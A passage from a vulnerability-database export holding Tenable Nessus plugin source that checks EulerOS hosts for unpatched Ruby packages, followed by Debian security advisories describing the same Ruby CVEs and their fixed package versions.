"sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108471);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n 
script_cve_id(\n \"CVE-2017-0898\",\n \"CVE-2017-0899\",\n \"CVE-2017-0900\",\n \"CVE-2017-0901\",\n \"CVE-2017-0902\",\n \"CVE-2017-0903\",\n \"CVE-2017-10784\",\n \"CVE-2017-14033\",\n \"CVE-2017-14064\",\n \"CVE-2017-17405\",\n \"CVE-2017-17790\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : ruby (EulerOS-SA-2018-1067)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ruby packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that the Net::FTP module did not\n properly process filenames in combination with certain\n operations. A remote attacker could exploit this flaw\n to execute arbitrary commands by setting up a malicious\n FTP server and tricking a user or Ruby application into\n downloading files with specially crafted names using\n the Net::FTP module. (CVE-2017-17405)\n\n - A buffer underflow was found in ruby's sprintf\n function. An attacker, with ability to control its\n format string parameter, could send a specially crafted\n string that would disclose heap memory or crash the\n interpreter. (CVE-2017-0898)\n\n - It was found that rubygems did not sanitize gem names\n during installation of a given gem. A specially crafted\n gem could use this flaw to install files outside of the\n regular directory. (CVE-2017-0901)\n\n - A vulnerability was found where rubygems did not\n sanitize DNS responses when requesting the hostname of\n the rubygems server for a domain, via a _rubygems._tcp\n DNS SRV query. An attacker with the ability to\n manipulate DNS responses could direct the gem command\n towards a different domain. 
(CVE-2017-0902)\n\n - A vulnerability was found where the rubygems module was\n vulnerable to an unsafe YAML deserialization when\n inspecting a gem. Applications inspecting gem files\n without installing them can be tricked to execute\n arbitrary code in the context of the ruby interpreter.\n (CVE-2017-0903)\n\n - It was found that WEBrick did not sanitize all its log\n messages. If logs were printed in a terminal, an\n attacker could interact with the terminal via the use\n of escape sequences. (CVE-2017-10784)\n\n - It was found that the decode method of the\n OpenSSL::ASN1 module was vulnerable to buffer underrun.\n An attacker could pass a specially crafted string to\n the application in order to crash the ruby interpreter,\n causing a denial of service. (CVE-2017-14033)\n\n - A vulnerability was found where rubygems did not\n properly sanitize gems' specification text. A specially\n crafted gem could interact with the terminal via the\n use of escape sequences. (CVE-2017-0899)\n\n - It was found that rubygems could use an excessive\n amount of CPU while parsing a sufficiently long gem\n summary. A specially crafted gem from a gem repository\n could freeze gem commands attempting to parse its\n summary. (CVE-2017-0900)\n\n - A buffer overflow vulnerability was found in the JSON\n extension of ruby. An attacker with the ability to pass\n a specially crafted JSON input to the extension could\n use this flaw to expose the interpreter's heap memory.\n (CVE-2017-14064)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1067\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0d95c5c2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ruby-2.0.0.648-33.h2\",\n \"ruby-irb-2.0.0.648-33.h2\",\n \"ruby-libs-2.0.0.648-33.h2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:53:13", "description": "According to the versions of the ruby packages 
installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that the Net::FTP module did not\n properly process filenames in combination with certain\n operations. A remote attacker could exploit this flaw\n to execute arbitrary commands by setting up a malicious\n FTP server and tricking a user or Ruby application into\n downloading files with specially crafted names using\n the Net::FTP module. (CVE-2017-17405)\n\n - A buffer underflow was found in ruby's sprintf\n function. An attacker, with ability to control its\n format string parameter, could send a specially crafted\n string that would disclose heap memory or crash the\n interpreter. (CVE-2017-0898)\n\n - It was found that rubygems did not sanitize gem names\n during installation of a given gem. A specially crafted\n gem could use this flaw to install files outside of the\n regular directory. (CVE-2017-0901)\n\n - A vulnerability was found where rubygems did not\n sanitize DNS responses when requesting the hostname of\n the rubygems server for a domain, via a _rubygems._tcp\n DNS SRV query. An attacker with the ability to\n manipulate DNS responses could direct the gem command\n towards a different domain. (CVE-2017-0902)\n\n - A vulnerability was found where the rubygems module was\n vulnerable to an unsafe YAML deserialization when\n inspecting a gem. Applications inspecting gem files\n without installing them can be tricked to execute\n arbitrary code in the context of the ruby interpreter.\n (CVE-2017-0903)\n\n - It was found that WEBrick did not sanitize all its log\n messages. If logs were printed in a terminal, an\n attacker could interact with the terminal via the use\n of escape sequences. 
(CVE-2017-10784)\n\n - It was found that the decode method of the\n OpenSSL::ASN1 module was vulnerable to buffer underrun.\n An attacker could pass a specially crafted string to\n the application in order to crash the ruby interpreter,\n causing a denial of service. (CVE-2017-14033)\n\n - A vulnerability was found where rubygems did not\n properly sanitize gems' specification text. A specially\n crafted gem could interact with the terminal via the\n use of escape sequences. (CVE-2017-0899)\n\n - It was found that rubygems could use an excessive\n amount of CPU while parsing a sufficiently long gem\n summary. A specially crafted gem from a gem repository\n could freeze gem commands attempting to parse its\n summary. (CVE-2017-0900)\n\n - A buffer overflow vulnerability was found in the JSON\n extension of ruby. An attacker with the ability to pass\n a specially crafted JSON input to the extension could\n use this flaw to expose the interpreter's heap memory.\n (CVE-2017-14064)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-03-20T00:00:00", "title": "EulerOS 2.0 SP1 : ruby (EulerOS-SA-2018-1066)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "modified": "2018-03-20T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ruby-libs", "p-cpe:/a:huawei:euleros:ruby-irb", "p-cpe:/a:huawei:euleros:ruby", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1066.NASL", "href": "https://www.tenable.com/plugins/nessus/108470", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108470);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-0898\",\n \"CVE-2017-0899\",\n \"CVE-2017-0900\",\n \"CVE-2017-0901\",\n \"CVE-2017-0902\",\n \"CVE-2017-0903\",\n \"CVE-2017-10784\",\n \"CVE-2017-14033\",\n \"CVE-2017-14064\",\n \"CVE-2017-17405\",\n \"CVE-2017-17790\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : ruby (EulerOS-SA-2018-1066)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ruby packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that the Net::FTP module did not\n properly process filenames in combination with certain\n 
operations. A remote attacker could exploit this flaw\n to execute arbitrary commands by setting up a malicious\n FTP server and tricking a user or Ruby application into\n downloading files with specially crafted names using\n the Net::FTP module. (CVE-2017-17405)\n\n - A buffer underflow was found in ruby's sprintf\n function. An attacker, with ability to control its\n format string parameter, could send a specially crafted\n string that would disclose heap memory or crash the\n interpreter. (CVE-2017-0898)\n\n - It was found that rubygems did not sanitize gem names\n during installation of a given gem. A specially crafted\n gem could use this flaw to install files outside of the\n regular directory. (CVE-2017-0901)\n\n - A vulnerability was found where rubygems did not\n sanitize DNS responses when requesting the hostname of\n the rubygems server for a domain, via a _rubygems._tcp\n DNS SRV query. An attacker with the ability to\n manipulate DNS responses could direct the gem command\n towards a different domain. (CVE-2017-0902)\n\n - A vulnerability was found where the rubygems module was\n vulnerable to an unsafe YAML deserialization when\n inspecting a gem. Applications inspecting gem files\n without installing them can be tricked to execute\n arbitrary code in the context of the ruby interpreter.\n (CVE-2017-0903)\n\n - It was found that WEBrick did not sanitize all its log\n messages. If logs were printed in a terminal, an\n attacker could interact with the terminal via the use\n of escape sequences. (CVE-2017-10784)\n\n - It was found that the decode method of the\n OpenSSL::ASN1 module was vulnerable to buffer underrun.\n An attacker could pass a specially crafted string to\n the application in order to crash the ruby interpreter,\n causing a denial of service. (CVE-2017-14033)\n\n - A vulnerability was found where rubygems did not\n properly sanitize gems' specification text. 
A specially\n crafted gem could interact with the terminal via the\n use of escape sequences. (CVE-2017-0899)\n\n - It was found that rubygems could use an excessive\n amount of CPU while parsing a sufficiently long gem\n summary. A specially crafted gem from a gem repository\n could freeze gem commands attempting to parse its\n summary. (CVE-2017-0900)\n\n - A buffer overflow vulnerability was found in the JSON\n extension of ruby. An attacker with the ability to pass\n a specially crafted JSON input to the extension could\n use this flaw to expose the interpreter's heap memory.\n (CVE-2017-14064)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1066\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3db34d7b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ruby-2.0.0.648-33.h2\",\n \"ruby-irb-2.0.0.648-33.h2\",\n \"ruby-libs-2.0.0.648-33.h2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n 
exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:22:45", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901"], "description": "Package : ruby1.9.1\nVersion : 1.9.3.194-8.1+deb7u6\nCVE ID : CVE-2017-0898 CVE-2017-0899 CVE-2017-0900 CVE-2017-0901 \n CVE-2017-10784 CVE-2017-14033 CVE-2017-14064\nDebian Bug : 873802 873906 875928 875931 875936\n\nMultiple vulnerabilities were discovered in the Ruby 1.9 interpretor.\n\nCVE-2017-0898\n\n Buffer underrun vulnerability in Kernel.sprintf\n\nCVE-2017-0899\n\n ANSI escape sequence vulnerability\n\nCVE-2017-0900\n\n DOS vulernerability in the query command\n\nCVE-2017-0901\n\n gem installer allows a malicious gem to overwrite arbitrary files\n\nCVE-2017-10784\n\n Escape sequence injection vulnerability in the Basic\n authentication of WEBrick\n\nCVE-2017-14033\n\n Buffer underrun vulnerability in OpenSSL ASN1 decode\n\nCVE-2017-14064\n\n Heap exposure vulnerability in generating JSON\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n1.9.3.194-8.1+deb7u6.\n\nWe recommend that you upgrade your ruby1.9.1 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-09-26T21:17:14", "published": "2017-09-26T21:17:14", "id": "DEBIAN:DLA-1114-1:DA09C", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00029.html", "title": "[SECURITY] [DLA 1114-1] ruby1.9.1 security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T01:05:17", 
"bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4031-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nNovember 11, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ruby2.3\nCVE ID : CVE-2017-0898 CVE-2017-0903 CVE-2017-10784 CVE-2017-14033\nDebian Bug : 875928 875931 875936 879231\n\nSeveral vulnerabilities have been discovered in the interpreter for the\nRuby language. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2017-0898\n\n aerodudrizzt reported a buffer underrun vulnerability in the sprintf\n method of the Kernel module resulting in heap memory corruption or\n information disclosure from the heap.\n\nCVE-2017-0903\n\n Max Justicz reported that RubyGems is prone to an unsafe object\n deserialization vulnerability. When parsed by an application which\n processes gems, a specially crafted YAML formatted gem specification\n can lead to remote code execution.\n\nCVE-2017-10784\n\n Yusuke Endoh discovered an escape sequence injection vulnerability\n in the Basic authentication of WEBrick. An attacker can take\n advantage of this flaw to inject malicious escape sequences to the\n WEBrick log and potentially execute control characters on the\n victim's terminal emulator when reading logs.\n\nCVE-2017-14033\n\n asac reported a buffer underrun vulnerability in the OpenSSL\n extension. 
A remote attacker can take advantage of this flaw to\n cause the Ruby interpreter to crash leading to a denial of service.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 2.3.3-1+deb9u2.\n\nWe recommend that you upgrade your ruby2.3 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 10, "modified": "2017-11-11T14:46:21", "published": "2017-11-11T14:46:21", "id": "DEBIAN:DSA-4031-1:AC0D9", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00294.html", "title": "[SECURITY] [DSA 4031-1] ruby2.3 security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T00:58:06", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0900", "CVE-2017-0899", "CVE-2016-7798", "CVE-2017-0902", "CVE-2015-9096", "CVE-2017-14064", "CVE-2017-0901"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3966-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nSeptember 05, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ruby2.3\nCVE ID : CVE-2015-9096 CVE-2016-7798 CVE-2017-0899 CVE-2017-0900 \n CVE-2017-0901 CVE-2017-0902 CVE-2017-14064\n\nMultiple vulnerabilities were discovered in the interpreter for the Ruby\nlanguage:\n\nCVE-2015-9096\n\n SMTP command injection in Net::SMTP.\n\nCVE-2016-7798\n\n Incorrect handling of initialization vector in the GCM mode in the\n OpenSSL extension.\n\nCVE-2017-0900\n\n Denial of service in the RubyGems client.\n\nCVE-2017-0901\n\n Potential file overwrite in the RubyGems client.\n\nCVE-2017-0902\n\n DNS hijacking in the RubyGems 
client.\n\nCVE-2017-14064\n\n Heap memory disclosure in the JSON library.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 2.3.3-1+deb9u1. This update also hardens RubyGems against\nmalicious termonal escape sequences (CVE-2017-0899).\n\nWe recommend that you upgrade your ruby2.3 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 10, "modified": "2017-09-05T20:18:25", "published": "2017-09-05T20:18:25", "id": "DEBIAN:DSA-3966-1:856A1", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00228.html", "title": "[SECURITY] [DSA 3966-1] ruby2.3 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:57", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-10784"], "description": "Package : ruby1.8\nVersion : 1.8.7.358-7.1+deb7u4\nCVE ID : CVE-2017-0898 CVE-2017-10784\nDebian Bug : 875931 875936\n\nSome vulnerabilities were found in the Ruby 1.8 package that affects\nthe LTS distribution.\n\nCVE-2017-0898\n\n Buffer underrun vulnerability in Kernel.sprintf\n\nCVE-2017-10784\n\n Escape sequence injection vulnerability in the Basic\n authentication of WEBrick\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n1.8.7.358-7.1+deb7u4.\n\nWe recommend that you upgrade your ruby1.8 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-09-26T21:17:16", "published": "2017-09-26T21:17:16", "id": "DEBIAN:DLA-1113-1:5D775", "href": 
"https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00030.html", "title": "[SECURITY] [DLA 1113-1] ruby1.8 security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:59", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0900", "CVE-2017-0901"], "description": "Package : rubygems\nVersion : 1.8.24-1+deb7u1\nCVE ID : CVE-2017-0900 CVE-2017-0901\nDebian Bug : 873802\n\nSome vulnerabilities were found in the Rubygems package that affects\nthe LTS distribution.\n\nCVE-2017-0900\n\n DOS vulernerability in the query command\n\nCVE-2017-0901\n\n gem installer allows a malicious gem to overwrite arbitrary files\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n1.8.24-1+deb7u1.\n\nWe recommend that you upgrade your rubygems packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-09-27T02:19:56", "published": "2017-09-27T02:19:56", "id": "DEBIAN:DLA-1112-1:73A63", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00031.html", "title": "[SECURITY] [DLA 1112-1] rubygems security update", "type": "debian", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-11T01:30:44", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2018-8778", "CVE-2017-17742", "CVE-2017-0899", "CVE-2017-10784", "CVE-2018-8780", "CVE-2018-1000078", "CVE-2016-2339", "CVE-2018-1000075", "CVE-2018-1000076", "CVE-2016-7798", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2015-9096", "CVE-2018-8777", "CVE-2017-14064", "CVE-2017-0901", "CVE-2018-8779", "CVE-2018-1000077", "CVE-2018-1000079", "CVE-2018-6914"], "description": "Package : ruby2.1\nVersion : 2.1.5-2+deb8u4\nCVE ID : 
CVE-2015-9096 CVE-2016-2339 CVE-2016-7798 CVE-2017-0898\n CVE-2017-0899 CVE-2017-0900 CVE-2017-0901 CVE-2017-0902\n CVE-2017-0903 CVE-2017-10784 CVE-2017-14033 CVE-2017-14064\n CVE-2017-17405 CVE-2017-17742 CVE-2017-17790 CVE-2018-6914\n CVE-2018-8777 CVE-2018-8778 CVE-2018-8779 CVE-2018-8780\n CVE-2018-1000075 CVE-2018-1000076 CVE-2018-1000077\n CVE-2018-1000078 CVE-2018-1000079\nDebian Bug : 851161\n\nMultiple vulnerabilities were found in the interpreter for the Ruby\nlanguage. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues:\n\nCVE-2015-9096\n\n SMTP command injection in Net::SMTP via CRLF sequences in a RCPT TO\n or MAIL FROM command.\n\nCVE-2016-2339\n\n Exploitable heap overflow in Fiddle::Function.new.\n\nCVE-2016-7798\n\n Incorrect handling of initialization vector in the GCM mode in the\n OpenSSL extension.\n\nCVE-2017-0898\n\n Buffer underrun vulnerability in Kernel.sprintf.\n\nCVE-2017-0899\n\n ANSI escape sequence vulnerability in RubyGems.\n\nCVE-2017-0900\n\n DoS vulnerability in the RubyGems query command.\n\nCVE-2017-0901\n\n gem installer allowed a malicious gem to overwrite arbitrary files.\n\nCVE-2017-0902\n\n RubyGems DNS request hijacking vulnerability.\n\nCVE-2017-0903\n\n Max Justicz reported that RubyGems is prone to an unsafe object\n deserialization vulnerability. When parsed by an application which\n processes gems, a specially crafted YAML formatted gem specification\n can lead to remote code execution.\n\nCVE-2017-10784\n\n Yusuke Endoh discovered an escape sequence injection vulnerability in\n the Basic authentication of WEBrick. An attacker can take advantage of\n this flaw to inject malicious escape sequences to the WEBrick log and\n potentially execute control characters on the victim's terminal\n emulator when reading logs.\n\nCVE-2017-14033\n\n asac reported a buffer underrun vulnerability in the OpenSSL\n extension. 
A remote attacker could take advantage of this flaw to\n cause the Ruby interpreter to crash leading to a denial of service.\n\nCVE-2017-14064\n\n Heap memory disclosure in the JSON library.\n\nCVE-2017-17405\n\n A command injection vulnerability in Net::FTP might allow a\n malicious FTP server to execute arbitrary commands.\n\nCVE-2017-17742\n\n Aaron Patterson reported that WEBrick bundled with Ruby was vulnerable\n to an HTTP response splitting vulnerability. It was possible for an\n attacker to inject fake HTTP responses if a script accepted an\n external input and output it without modifications.\n\nCVE-2017-17790\n\n A command injection vulnerability in lib/resolv.rb's lazy_initialze\n might allow a command injection attack. However untrusted input to\n this function is rather unlikely.\n\nCVE-2018-6914\n\n ooooooo_q discovered a directory traversal vulnerability in the\n Dir.mktmpdir method in the tmpdir library. It made it possible for\n attackers to create arbitrary directories or files via a .. (dot dot)\n in the prefix argument.\n\nCVE-2018-8777\n\n Eric Wong reported an out-of-memory DoS vulnerability related to a\n large request in WEBrick bundled with Ruby.\n\nCVE-2018-8778\n\n aerodudrizzt found a buffer under-read vulnerability in the Ruby\n String#unpack method. If a big number was passed with the specifier @,\n the number was treated as a negative value, and an out-of-buffer read\n occurred. Attackers could read data on heaps if an script accepts an\n external input as the argument of String#unpack.\n\nCVE-2018-8779\n\n ooooooo_q reported that the UNIXServer.open and UNIXSocket.open\n methods of the socket library bundled with Ruby did not check for NUL\n bytes in the path argument. 
